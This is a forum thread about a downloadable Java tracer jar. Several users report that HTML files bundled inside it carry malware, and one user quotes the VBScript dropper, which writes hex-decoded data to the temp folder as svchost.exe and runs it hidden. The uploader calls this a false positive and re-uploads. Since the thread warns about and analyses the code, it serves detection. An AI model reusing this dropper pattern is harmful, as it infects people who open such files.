Tracer v2
Tracer v2
Java tracer, this time as a standalone jar, Just select a Jar and an output text file, click Trace, and wheel that's it! classes which start with "java." can't be logged! Download link: http://www18.zippyshare.com/v/qhcVnrK0/file.html |
This file contains a VIRUS !!!
No, it's no false positive. There are at least seven HTML files "package.html" inside which contain JavaScript to drop a file called "svchost.exe" |
Yep actually looks pretty dodgy, seems to try and use vbscript to drop svchost.exe
--<SCRIPT Language=VBScript><!-- DropFileName = "svchost.exe" WriteData = ...... Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 </SCRIPT> Haven't actually checked out the file that is to be dropped yet. |
I could read same report at another forum and CodeCracker replied saying that is a false positive. But... i still have my doubts :rolleyes:
|
False positive due to some htmls present under jar archive.
If you already runed the jar file don't be alarmed since the html are not executed, and not even used. Htmls removed, check: http://www18.zippyshare.com/v/qhcVnrK0/file.html |
so who and why the hell added malware html into your archives?
|
Quote:
Quote:
Or would you call the ebolavirus "false positive" just because it's contained inside a glass phial? |
@CodeCracker can this be used for a jar file that is launched with an EXE file?
|
It can trace only jars
Quote:
You could try JavaClassManager https://forum.exetools.com/showthread.php?t=18592 to try to save loaded classes. JavaClassManager can launch both jar and exe extensions, it is just a matter of intercepting class loading and editing classes to do what you want. |
Thanks for the guidance bro. i will try your recommendation :)
peace |
All times are GMT +8. The time now is 12:23. |
Powered by vBulletin® Version 3.8.8
Copyright ©2000 - 2024, vBulletin Solutions, Inc.
Always Your Best Friend: Aaron, JMI, ahmadmansoor, ZeNiX